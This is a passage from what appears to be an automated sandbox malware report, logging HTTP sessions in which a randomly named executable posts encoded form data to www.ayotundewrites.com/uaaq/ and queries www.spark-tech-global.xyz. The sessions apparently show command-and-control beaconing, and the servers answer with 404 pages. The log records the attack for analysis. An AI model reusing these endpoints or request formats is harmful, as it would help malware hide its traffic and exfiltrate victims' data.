                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 47 6b 4f 37 4d 38 45 6f 55 38 64 6e 6b 65 47 41 6a 4f 6a 77 33 78 4a 66 53 72 69 4a 50 77 33 6c 4e 33 4c 4d 6b 42 38 7a 33 50 41 70 71 35 69 6a 49 47 4e 74 4c 74 32 66 74 4e 34 72 49 76 74 4b 32 73 42 6e 78 69 44 4b 61 54 58 68 2b 6b 66 69 37 57 76 46 37 30 59 59 4d 76 4b 32 33 2b 75 31 32 2b 38 6d 4f 5a 36 59 79 4c 35 49 37 4d 30 38 5a 2f 5a 57 67 57 44 51 47 35 78 50 41 33 6e 44 44 4d 41 37 57 51 76 31 46 47 64 62 54 44 50 36 47 50 6f 50 37 4c 68 53 52 36 62 5a 7a 31 79 44 44 71 6b 56 71 49 6e 78 5a 49 79 4d 69 39 4b 71 70 58 45 45 6f 71 68 68 67 58 74 64 32 37 4d 67 39 4a 48 57 39 59 49 46 42 42 68 56 31 78 50 47 63 62 30 64 36 47 6d 53 35 4d 44 38 6d 57 46 34 71 68 5a 55 62 61 2f 66 43 6e 4a 44 57 76 66 2b 65 46 6e 55 5a 78 7a 6e 43 6c 61 59 65 2b 66 39 54 55 36 70 4e 6b 4c 77 35 45 69 56 77 35 6e 71 66 42 4e 42 5a 6f 76 36 72 55 5a 62 35 56 78 72 38 33 4f 67 63 71 4d 31 30 71 6b 53 6b 4a 5a 2b 44 6c 72 42 52 45 74 4b 63 78 51 30 33 68 70 62 71 4f 4f 51 47 31 4f 73 53 4b 67 67 67 51 69 34 32 67 39 70 74 69 74 4b 6d 6d 69 74 34 54 4f 36 2b 69 35 2b 47 52 62 70 42 31 48 77 48 68 36 6c 57 6b 36 4d 69 42 59 43 2b 32 79 36 75 6c 71 32 50 5a 6f 77 2b 43 45 56 39 48 4b 43 79 68 4d 79 6e 70 50 63 33 63 78 2f 6e 44 59 6c 38 6e 6e 64 2b 50 66 5a 43 44 43 46 48 6d 48 41 57 66 5a 7a 4c 38 52 77 51 52 4e 2f 6e 42 69 51 52 39 44 49 6e 31 6c 31 54 59 67 4e 46 38 65 75 63 2b 4b 4d 73 61 2b 76 45 50 4a 48 47 4d 30 30 36 41 34 39 78 77 7a 64 42 68 6e 46 38 53 65 48 4b 6b 53 63 7a 68 70 75 4e 51 50 37 43 4c 72 53 43 6d 55 4b 63 5a 7a 74 53 6e 4d 79 46 41 72 70 49 54 62 77 6b 4f 77 42 77 61 66 67 6d 48 76 75 4d 42 42 58 6e 30 53 65 55 76 66 52 55 49 53 78 38 6a 53 69 57 44 72 51 6e 52 4a 35 74 6c 62 39 66 39 47 35 79 62 77 6d 4d 43 70 63 45 54 61 74 39 67 6e 53 42 70 53 6d 38 74 4b 73 54 57 38 48 2b 2f 6e 42 4e 65 44 64 50 33 49 31 77 44 5a 75 68 44 62 34 47 30 72 4f 62 67 39 71 47 68 4a 41 71 2f 42 39 37 58 63 56 41 48 42 64 4f 67 6a 31 64 4d 79 34 59 59 6d 45 50 63 70 48 34 63 61 61 2b 33 54 31 36 5a 4e 44 71 63 41 31 79 4b 73 46 75 62 78 2b 41 43 72 75 62 36 50 78 6d 52 46 54 49 48 7a 51 70 66 31 79 48 46 5a 4b 33 6e 6c 62 6a 56 67 59 57 45 32 69 4f 69 39 43 47 42 38 66 2f 37 5a 2b 52 71 4a 6e 50 44 75 47 5a 70 73 4a 59 33 65 62 31 64 41 54 2f 4e 63 72 5a 72 79 35 6d 65 51 32 56 2f 34 77 71 76 54 51 55 5a 57 37 45 6d 39 43 6b 55 71 33 32 31 58 65 51 72 70 70 71 63 53 61 39 61 2f 32 69 77 6f 2b 52 41 42 72 34 55 4d 33 77 37 75 54 38 74 66 43 4d 6a 42 32 4e 45 30 65 34 2f 69 49 6c 2f 35 7a 46 72 32 46 59 45 47 51 49 72 77 4b 71 5a 50 63 71 55 38 31 4f 54 38 56 4e 2f 6a 68 50 6a 45 70 55 78 42 6c 66 4c 37 4b 71 39 34 57 51 63 62 70 4d 38 4d 66 68 74 57 77 34 56 66 4a 59 6b 30 35 47 79 74 77 64 59 6b 6a 37 6a 47 67 49 46 2f 4b 71 68 44 62 6e 6c 65 68 52 6b 52 58 35 6c 33 4a 7a 43 70 42 58 4e 43 68 6d 71 6c 65 47 53 2f 31 4f 76 37 4a 6c 6c 4d 47 71 39 6d 46 62 72 35 53 64 34 31 6f 62 6e 64 68 2f 47 78 79 6a 42 52 77 4d 53 2b 57 77 32 46 52 36 55 72 4e 64 4d 47 65 2b 50 35 50 46 54 33 72 36 41 51 43 7a 57 48 51 55 4a 42 69 42 37 6e 57 31 67 71 54 4b 69 76 32 36 54 62 77 70 50 38 51 53 52 70 44 37 41 31 54 4c 65 6a 74 73 6d 4b 4a 49 69 34 4f 38 4a 5a 68 30 57 6c 61 45 7a 68 41 6b 6f 68 4d 5a 67 33 46 4c 33 6b 4e 30 44 43 76 57 7a 6a 72 48 53 4b 4d 65 69 42 2b 58 4f 4a 66
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPw3lN3LMkB8z3PApq5ijIGNtLt2ftN4rIvtK2sBnxiDKaTXh+kfi7WvF70YYMvK23+u12+8mOZ6YyL5I7M08Z/ZWgWDQG5xPA3nDDMA7WQv1FGdbTDP6GPoP7LhSR6bZz1yDDqkVqInxZIyMi9KqpXEEoqhhgXtd27Mg9JHW9YIFBBhV1xPGcb0d6GmS5MD8mWF4qhZUba/fCnJDWvf+eFnUZxznClaYe+f9TU6pNkLw5EiVw5nqfBNBZov6rUZb5Vxr83OgcqM10qkSkJZ+DlrBREtKcxQ03hpbqOOQG1OsSKgggQi42g9ptitKmmit4TO6+i5+GRbpB1HwHh6lWk6MiBYC+2y6ulq2PZow+CEV9HKCyhMynpPc3cx/nDYl8nnd+PfZCDCFHmHAWfZzL8RwQRN/nBiQR9DIn1l1TYgNF8euc+KMsa+vEPJHGM006A49xwzdBhnF8SeHKkSczhpuNQP7CLrSCmUKcZztSnMyFArpITbwkOwBwafgmHvuMBBXn0SeUvfRUISx8jSiWDrQnRJ5tlb9f9G5ybwmMCpcETat9gnSBpSm8tKsTW8H+/nBNeDdP3I1wDZuhDb4G0rObg9qGhJAq/B97XcVAHBdOgj1dMy4YYmEPcpH4caa+3T16ZNDqcA1yKsFubx+ACrub6PxmRFTIHzQpf1yHFZK3nlbjVgYWE2iOi9CGB8f/7Z+RqJnPDuGZpsJY3eb1dAT/NcrZry5meQ2V/4wqvTQUZW7Em9CkUq321XeQrppqcSa9a/2iwo+RABr4UM3w7uT8tfCMjB2NE0e4/iIl/5zFr2FYEGQIrwKqZPcqU81OT8VN/jhPjEpUxBlfL7Kq94WQcbpM8MfhtWw4VfJYk05GytwdYkj7jGgIF/KqhDbnlehRkRX5l3JzCpBXNChmqleGS/1Ov7JllMGq9mFbr5Sd41obndh/GxyjBRwMS+Ww2FR6UrNdMGe+P5PFT3r6AQCzWHQUJBiB7nW1gqTKiv26TbwpP8QSRpD7A1TLejtsmKJIi4O8JZh0WlaEzhAkohMZg3FL3kN0DCvWzjrHSKMeiB+XOJf
                                                                                    Dec 4, 2023 12:05:35.961343050 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    32192.168.11.3049786162.0.222.11980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:38.359138012 CET433OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:38.667846918 CET602INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:38 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.11.304978783.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:44.292829037 CET710OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 32 43 54 4d 74 79 48 62 34 6f 51 4e 33 4f 68 78 6d 59 77 6c 59 4f 79 52 58 47 6c 68 6d 7a 68 70 36 4c 4b 32 33 4f 38 50 72 73 48 56 2b 36 56 78 34 58 6d 55 52 49 7a 4e 37 46 6f 4c 30 47 6e 79 33 4c 56 65 67 4b 71 49 4f 51 6a 41 75 4f 34 65 38 4a 79 69 47 51 38 4d 4d 59 64 67 69 70 77 45 4c 4c 30 63 67 77 37 41 48 68 72 73 54 77 30 4d 6f 57 76 33 78 78 31 54 39 46 61 32 59 35 75 32 4c 4a 33 74 49 49 38 6f 65 56 77 68 54 5a 52 78 38 45 53 61 6d 53 37 76 59 78 62 4b 66 78 4e 42 74 5a 4c 42 75 41 3d 3d
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT2CTMtyHb4oQN3OhxmYwlYOyRXGlhmzhp6LK23O8PrsHV+6Vx4XmURIzN7FoL0Gny3LVegKqIOQjAuO4e8JyiGQ8MMYdgipwELL0cgw7AHhrsTw0MoWv3xx1T9Fa2Y5u2LJ3tII8oeVwhTZRx8ESamS7vYxbKfxNBtZLBuA==
                                                                                    Dec 4, 2023 12:05:44.475306988 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:44 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.11.304978883.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:47.000072002 CET730OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 33 69 6a 4d 2b 6b 50 62 2b 49 51 4f 72 65 68 78 2f 49 77 2b 59 4f 2b 52 58 43 63 73 6d 48 4e 70 2f 65 32 32 34 71 6f 50 6f 73 48 56 72 4b 56 30 32 33 6d 64 52 49 2f 6a 37 46 6b 4c 30 47 6a 79 33 4c 6c 65 6a 37 71 4c 50 41 6a 43 6f 4f 34 51 6b 70 79 69 47 51 38 4d 4d 63 39 47 69 70 6f 45 4c 37 45 63 69 55 50 44 4b 42 72 76 57 77 30 4d 73 57 76 7a 78 78 31 6c 39 45 32 59 59 37 6d 32 4c 49 48 74 4a 61 55 6e 56 56 77 37 4d 70 51 2f 74 6c 6a 77 71 41 37 55 56 77 6a 7a 47 45 31 52 6f 4d 6e 53 70 2b 5a 4c 33 31 44 30 62 6a 33 42 32 6d 7a 33 76 59 58 62 71 64 38 3d
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHNp/e224qoPosHVrKV023mdRI/j7FkL0Gjy3Llej7qLPAjCoO4QkpyiGQ8MMc9GipoEL7EciUPDKBrvWw0MsWvzxx1l9E2YY7m2LIHtJaUnVVw7MpQ/tljwqA7UVwjzGE1RoMnSp+ZL31D0bj3B2mz3vYXbqd8=
                                                                                    Dec 4, 2023 12:05:47.179019928 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.11.304978983.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:49.704207897 CET1647OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
